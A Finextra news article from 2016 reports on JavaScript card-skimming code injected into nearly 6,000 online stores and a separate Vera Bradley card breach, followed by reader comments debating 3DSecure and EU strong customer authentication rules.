11 December 2017
visit www.aciworldwide.com

Hackers hit 6000 web stores to steal card data

14 October 2016  |  10551 views  |  10 Computer virus

Crooks have injected malicious code into 5925 online stores, enabling them to steal payment card details, according to a Dutch developer.

Willem De Groot says that hackers have been gaining access to the stores' source code using unpatched software flaws, and installing JavaScript wiretaps to steal card data. The information makes its way to an off-shore collection server - usually in Russia, says De Groot - before being put up for sale on the dark web for around $30 a card.

De Groot scanned a batch of 255,000 online stores last November, when he first heard about the scam. At the time he found 3501 compromised sites but by this September the number of victims had risen to 5925 and included Audi, pop star Bjork and Washington Cathedral.

Separately, fashion retailer Vera Bradley says that it has been told by law enforcement about a data breach that puts customer card details at risk. Cards used at the firm's shops between the end of July and end of September may have been affected.

Crooks appear to have accessed Vera Bradley's payment processing system and installed a program designed to find card numbers, cardholder names, expiration dates, and internal verification codes via mag stripes.

Comments: (10)

A Finextra member
A Finextra member | 14 October, 2016, 14:08

Merchants protected by 3DSecure  or its big data successors will not be too worried -  merchants who are not embracing  3DS should be concerned. 

Be the first to give this comment the thumbs up 0 thumb ups! (Log in to thumb up)
Ketharaman Swaminathan
Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune | 14 October, 2016, 16:35

Merchants protected by 3DS will have bigger worries - like how to pay their bills.

Mitigating Fraud Does Not Pay The Bills

1 thumb up! 1 thumb up! (Log in to thumb up)
A Finextra member
A Finextra member | 16 October, 2016, 08:17 Oddly all the merchants in the U.K. That use 3DS pay their bills. UK consumers still buy online with confidence. The uk is one of the worlds most advanced ecommerce markets. Has very low fraud rates and low interchange too. By using 3DS and AVS They Also stop fraudsters from paying their bills OR subsidise other illegal activity. You seem to have a major downer on any effective counter fraud solution, POS or ecommerce. Why is that?
1 thumb up! 1 thumb up! (Log in to thumb up)
Ketharaman Swaminathan
Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune | 16 October, 2016, 11:00

Come out of anonymity if you expect me to answer personal questions.

Be the first to give this comment the thumbs up 0 thumb ups! (Log in to thumb up)
Jan-Olof Brunila
Jan-Olof Brunila - Swedbank - Stockholm | 17 October, 2016, 09:58

E comm crooks now need to make their last push in the EU and anybody active in  ecommerce needs to prepare for the new rules. In 2018 the updated payment services directive including strong customer authentication mandate (PSD2 + SCA) will demand a super-3DS with strong two factor authentication of both the payer consent + the amount. If not in place, payer account service providers (card issuers and others) must decline transaction attempts, also from e comm merchants outside the EU if the payer has an EU area payment account... Furthermore there will be penalties for any business that is negligent with personal data security - and a card number is personal data. The e commerce is becoming main-stream.  

Be the first to give this comment the thumbs up 0 thumb ups! (Log in to thumb up)
David Abbott
David Abbott - Nourpay - Riyadh | 17 October, 2016, 10:17

Hi Jan Olof, its interesting that in the UK (and possibly elsewhere) that  CA/Arcot's,  issuer side, 3DSecure  solution is using 'big data' to completely waive the 3DS password challenge and reply process...  

The decisioning (Authorise - Challenge - Decline)  is based on historic consumer behaviour and the intelligent assessment of threat.  I am not here to sell CA services, but as a consumer of them, via my bank (First Direct/HSBC), I am a huge fan,these transactions are frictionless but authenticated to a very high level of confidence for myself and the merchant.

1 thumb up! 1 thumb up! (Log in to thumb up)
Jan-Olof Brunila
Jan-Olof Brunila - Swedbank - Stockholm | 17 October, 2016, 10:37

Dear David, The EBA  circulated regulatory tech standards doc for strong customer authentication specially comments on that risk based authentication is not allowed when the SCA-RTS go live in 2018. So from the go-live date there is a legislation that backs up the demand for strong two factor or biometric authentication (with afree zone for less than 10 Euro e comm payments)! If we believe that the EU authorities are going to realize this legislation according to plan, we now need to start figuring out how we implement it in a user friendly way.

 

Be the first to give this comment the thumbs up 0 thumb ups! (Log in to thumb up)
Ketharaman Swaminathan
Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune | 17 October, 2016, 18:32

Would be interesting to see the impact of SCA-RTS on recurring payments. The Indian banking regulator mandated "explicit 2FA" via 3DS for all online card payments a few years ago. Apart from increasing friction and reducing conversion for one-off online card payments, the mandate virtually killed companies whose business model relies on monthly subscriptions (e.g. SAAS, media) - you can imagine the friction involved in individually having to two-factor authenticate 12 payments a year for each subscription service a customer has signed up for. Many subscription-based companies shifted their domicile overseas so that they can use ePGs that don't insist on 2FA; many customers - like me - opted for overseas service providers just to escape the onerous 2FA payments every month. A month ago, the regulator announced exemption of 2FA: Now only the first of the 12 months' payments is subject to 2FA. The remaining 11 monthly payments can happen without 2FA. The subscription industry has heaved a sigh of relief. I wonder how the EU subscription industry will react to SCA-RTS.

Be the first to give this comment the thumbs up 0 thumb ups! (Log in to thumb up)
Hitesh Thakkar
Hitesh Thakkar - FIS Payments Software and Services India - India | 17 October, 2016, 18:42

Fraud Prevention and risk management has become really costly and matter of business case to monitise it. Refer the recent PCI DSS compliance impacting in UK.

https://www.finextra.com/newsarticle/29598/new-eu-rules-could-cost-uk-firms-122bn-in-cybersecurity-fines---pci-ssc?utm_medium=newsflash&utm_source=2016-10-17
Be the first to give this comment the thumbs up 0 thumb ups! (Log in to thumb up)
A Finextra member
A Finextra member | 18 October, 2016, 09:09

It is true; the EBA are discussing the future of risk-based authentication "as we know it". That, however, does not mean the end for risk-based authentication. The technology we refer to as risk-based authentication is a sophisticated approach to trusted devices and shopping behaviour, which will be needed more than ever in the constant battle to secure payments. Already fraudster's are harvesting victims fingerprints and finding inventive ways to hack selfie technology. The EBA's guidelines are pretty simple; they require a two-factor approach to authenticating online transactions,  

Something:   1. You have 2. You are 3. You know  

The device is something you have; risk-based can intelligently confirm the device is trusted and behaving in a way that is indicative of a consumer's normal behaviour, and more importantly spot fraudulent patterns and anomalies. Recently a fraud attempt was made on my credit card; the Bank was able to detect the transactions as fraudulent, even though the amounts were below £10 by seeing an untrusted device in a strange location. I don't use the card very often so two transactions in quick succession set off an alert. Risk-based authentication takes care of the 1st factor verifying the cardholder is in possession of the device.     

Let's look at the second factor:  

Fingerprint - something you are 

Dynamic knowledge questions - something you know 

Selfies - something you are 

One-time pin - something you know 

Dynamic CVV - something you know 

App based push notification - something you know  

The truth is risk-based will just change its purpose, today it has been implemented to reduce inconvenience to cardholders, reducing the frequency they have to enter their password and let's be honest passwords have been a real pain causing unacceptable levels of abandonment through forgotten credentials. 100% challenge, however, if the challenge is a fingerprint or something else that is easy, is not such a big deal, or asking someone click yes or no to "are you in Starbucks." We can all agree it is much less painful than a blocked card, and a call to the fraud department to unblock it. But to avoid serious authentication overkill, risk-based offers one of two factors to be invisible. 

All that said the EBA guidelines are not final. Many banks are lobbying against the idea of 100% challenge. Either way intelligent machine learning approach to anomaly detection and device trust will not be going away.   

Be the first to give this comment the thumbs up 0 thumb ups! (Log in to thumb up)
Comment on this story (membership required)

Finextra news in your inbox

For Finextra's free daily newsletter, breaking news flashes and weekly jobs board: sign up now

Related stories

UK cops arrest ATM malware suspect in Romania

UK cops arrest ATM malware suspect in Romania

06 October 2016  |  7994 views  |  0 comments | 6 tweets | 3 linkedin
Teenager avoids conviction for CommBank DDoS attack

Teenager avoids conviction for CommBank DDoS attack

19 August 2016  |  8650 views  |  0 comments | 3 tweets | 3 linkedin
Sage shares slip on breach; HEI hotels admits POS infection

Sage shares slip on breach; HEI hotels admits POS infection

15 August 2016  |  6221 views  |  0 comments | 6 tweets | 3 linkedin
Hackers hit Oracle Micros POS unit

Hackers hit Oracle Micros POS unit

09 August 2016  |  6635 views  |  0 comments | 6 tweets | 9 linkedin
Wendy's finds more malware at restaurants

Wendy's finds more malware at restaurants

10 June 2016  |  8871 views  |  0 comments | 8 tweets | 4 linkedin
Malware turns whole ATMs into skimming devices

Malware turns whole ATMs into skimming devices

18 May 2016  |  9684 views  |  4 comments | 15 tweets | 22 linkedin
Hackers behind billion dollar SpyEye malware jailed

Hackers behind billion dollar SpyEye malware jailed

21 April 2016  |  7832 views  |  2 comments | 5 tweets | 7 linkedin
Malware found at 250 Hyatt hotels

Malware found at 250 Hyatt hotels

15 January 2016  |  7644 views  |  2 comments | 7 tweets | 11 linkedin

Related blogs

Create a blog about this story (membership required)
visit www.atos.netvisit www.solutions.lexisnexis.comvisit www.response.ncr.com

Top topics

Most viewed Most shared
Revolut lets customers buy Bitcoin, Litecoin and EthereumRevolut lets customers buy Bitcoin, Liteco...
18103 views comments | 26 tweets | 22 linkedin
Saxo Bank's 'Outrageous Prediction': Bitcoin to peak at $60k next year before spectacular crashSaxo Bank's 'Outrageous Prediction': Bitco...
11027 views comments | 7 tweets | 6 linkedin
Deutsche Bank paper hails 'huge' blockchain potentialDeutsche Bank paper hails 'huge' blockchai...
6634 views comments | 13 tweets | 20 linkedin
Santander UK poaches Barclays innovation chief Michael HarteSantander UK poaches Barclays innovation c...
6412 views comments | 8 tweets | 17 linkedin
Barclays, First Direct and Nationwide join FCA sandbox cohortBarclays, First Direct and Nationwide join...
5820 views comments | 5 tweets | 12 linkedin

Featured job

Competitive base, double ote, benefits
London, UK

Find your next job